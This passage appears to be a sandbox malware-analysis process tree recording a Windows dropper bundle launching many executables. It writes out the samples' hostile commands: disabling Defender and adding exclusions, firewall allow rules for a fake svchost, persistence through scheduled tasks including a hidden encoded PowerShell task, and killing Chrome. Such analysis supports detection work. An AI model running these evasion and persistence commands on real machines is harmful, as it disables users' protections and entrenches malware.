C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun103cc3be290a05.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun103cc3be290a05.exeSun103cc3be290a05.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun103cc3be290a05.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun103cc3be290a05.exe" -u6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1043644c2967579d0.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun1043644c2967579d0.exeSun1043644c2967579d0.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun1043644c2967579d0.exeC:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun1043644c2967579d0.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10c76e04e6f57.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10c76e04e6f57.exeSun10c76e04e6f57.exe5⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun103e58edca733.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun103e58edca733.exeSun103e58edca733.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",7⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",9⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun100a1efe5ce7fc0b.exe /mixtwo4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun100a1efe5ce7fc0b.exeSun100a1efe5ce7fc0b.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun100a1efe5ce7fc0b.exeSun100a1efe5ce7fc0b.exe /mixtwo6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 6887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10e4f04359b3ed33c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10e4f04359b3ed33c.exeSun10e4f04359b3ed33c.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\IWvhdszLzpxgS_lCai6WW0lT.exe"C:\Users\Admin\Pictures\Adobe Films\IWvhdszLzpxgS_lCai6WW0lT.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\bbkT8WlwFvEzMukVsZW4p3et.exe"C:\Users\Admin\Pictures\Adobe Films\bbkT8WlwFvEzMukVsZW4p3et.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6167⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8287⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\o7KJUaxa5gaD8f7BIm2pqaH6.exe"C:\Users\Admin\Pictures\Adobe Films\o7KJUaxa5gaD8f7BIm2pqaH6.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\jZ0C0q_MJ7VhtEj9FBPpKVeK.exe"C:\Users\Admin\Documents\jZ0C0q_MJ7VhtEj9FBPpKVeK.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\fTdq8ETnY6L8ZZrO6IQ2VSQz.exe"C:\Users\Admin\Pictures\Adobe Films\fTdq8ETnY6L8ZZrO6IQ2VSQz.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\gItz_jO0wn5_clLVmhUgb743.exe"C:\Users\Admin\Pictures\Adobe Films\gItz_jO0wn5_clLVmhUgb743.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 6169⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\NVjDgRUuwfUwnIwWJuE8_1Tf.exe"C:\Users\Admin\Pictures\Adobe Films\NVjDgRUuwfUwnIwWJuE8_1Tf.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\M98BM82l1ayaC0dJVcGrs5az.exe"C:\Users\Admin\Pictures\Adobe Films\M98BM82l1ayaC0dJVcGrs5az.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSF5E2.tmp\Install.exe.\Install.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 21808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 21408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\qRl9cxthRd0UyUtyJWT53C9S.exe"C:\Users\Admin\Pictures\Adobe Films\qRl9cxthRd0UyUtyJWT53C9S.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\rrCvgVgqxgxZK\Roads License Agreement.exe"C:\Users\Admin\AppData\Local\Temp\rrCvgVgqxgxZK\Roads License Agreement.exe"7⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" "--zTwBZr"8⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exeC:\Users\Admin\AppData\Roaming\Roads\Roads.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Roads\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Roads\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Roads\User Data" --annotation=plat=Win64 --annotation=prod=Roads --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e4,0x210,0x7ffc2d9ddec0,0x7ffc2d9dded0,0x7ffc2d9ddee09⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=gpu-process --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:29⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=1832 /prefetch:89⤵
- Loads dropped DLL
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=2248 /prefetch:89⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Roads\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2572 /prefetch:19⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Roads\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2596 /prefetch:19⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=gpu-process --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2664 /prefetch:29⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=1928 /prefetch:89⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=3476 /prefetch:89⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=3880 /prefetch:89⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=3904 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Roads\Roads.exe"C:\Users\Admin\AppData\Roaming\Roads\Roads.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,4227224916772177147,4456617789780305879,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Roads\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5692_1212364957" --mojo-platform-channel-handle=976 /prefetch:89⤵
-
C:\Users\Admin\Pictures\Adobe Films\tQ2rXUWRH10IT3jetzqneWop.exe"C:\Users\Admin\Pictures\Adobe Films\tQ2rXUWRH10IT3jetzqneWop.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 12327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\pbooekKg54FmM_Hnq0O0VsHM.exe"C:\Users\Admin\Pictures\Adobe Films\pbooekKg54FmM_Hnq0O0VsHM.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\pbooekKg54FmM_Hnq0O0VsHM.exe"C:\Users\Admin\Pictures\Adobe Films\pbooekKg54FmM_Hnq0O0VsHM.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\WMuLq3PFEFKhhywunmEUHY44.exe"C:\Users\Admin\Pictures\Adobe Films\WMuLq3PFEFKhhywunmEUHY44.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\Adobe Films\FVUso3fdKpZJr6ZfYZazF9yz.exe"C:\Users\Admin\Pictures\Adobe Films\FVUso3fdKpZJr6ZfYZazF9yz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSE9C1.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS1F96.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzbrretgy" /SC once /ST 15:09:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzbrretgy"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzbrretgy"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 23:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\DVBBKEq.exe\" j1 /site_id 525403 /S" /V1 /F9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\2nChThzdMr4TJpKUCL8E4CyT.exe"C:\Users\Admin\Pictures\Adobe Films\2nChThzdMr4TJpKUCL8E4CyT.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\2nChThzdMr4TJpKUCL8E4CyT.exe"C:\Users\Admin\Pictures\Adobe Films\2nChThzdMr4TJpKUCL8E4CyT.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\2nChThzdMr4TJpKUCL8E4CyT.exe"C:\Users\Admin\Pictures\Adobe Films\2nChThzdMr4TJpKUCL8E4CyT.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\tQfE3xlJTpODnakS0v_20EQV.exe"C:\Users\Admin\Pictures\Adobe Films\tQfE3xlJTpODnakS0v_20EQV.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Debbano.wp57⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^oYuXliAPwUGYfrFgsjoREDafiNmXBiiSmhiscTkUBcdBExyIxcxoTdXFGRPbHChUMOnwWhTnwgdojQLMHRDyNZZodBLDrNjYivPPVtLuCViEqOaPyePQZ$" Sbigottito.wp59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Tele.exe.pifTele.exe.pif D9⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Tele.exe.pifC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Tele.exe.pif10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\SN7DT7Zzyvw7xlDGoteXTShR.exe"C:\Users\Admin\Pictures\Adobe Films\SN7DT7Zzyvw7xlDGoteXTShR.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\IZSCvb_J2727vxUXl0geMMpf.exe"C:\Users\Admin\Pictures\Adobe Films\IZSCvb_J2727vxUXl0geMMpf.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",8⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\xwl0qPRfHqlOVQ4eWpqD5bN9.exe"C:\Users\Admin\Pictures\Adobe Films\xwl0qPRfHqlOVQ4eWpqD5bN9.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\go-memexec-809052243.exeC:\Users\Admin\AppData\Local\Temp\go-memexec-809052243.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ZB0OKZSL_hIHTo_URFkZ8yyp.exe"C:\Users\Admin\Pictures\Adobe Films\ZB0OKZSL_hIHTo_URFkZ8yyp.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Users\Admin\Pictures\Adobe Films\SjirvGC9N8vTXwhRSdpHymlt.exe"C:\Users\Admin\Pictures\Adobe Films\SjirvGC9N8vTXwhRSdpHymlt.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Q8aXiiq4GluAJF4ibtoj12WW.exe"C:\Users\Admin\Pictures\Adobe Films\Q8aXiiq4GluAJF4ibtoj12WW.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\V7ddKZrv5bDTMO2jx44XA59n.exe"C:\Users\Admin\Pictures\Adobe Films\V7ddKZrv5bDTMO2jx44XA59n.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\bN6daufaTx1pxNi3o1u5ozZZ.exe"C:\Users\Admin\Pictures\Adobe Films\bN6daufaTx1pxNi3o1u5ozZZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\LXJjQNsqHsf0dgXz8zdqYnLd.exe"C:\Users\Admin\Pictures\Adobe Films\LXJjQNsqHsf0dgXz8zdqYnLd.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\SuehZYrYpeTipF5_ZnsUl8Tu.exe"C:\Users\Admin\Pictures\Adobe Films\SuehZYrYpeTipF5_ZnsUl8Tu.exe"6⤵
- Executes dropped EXE
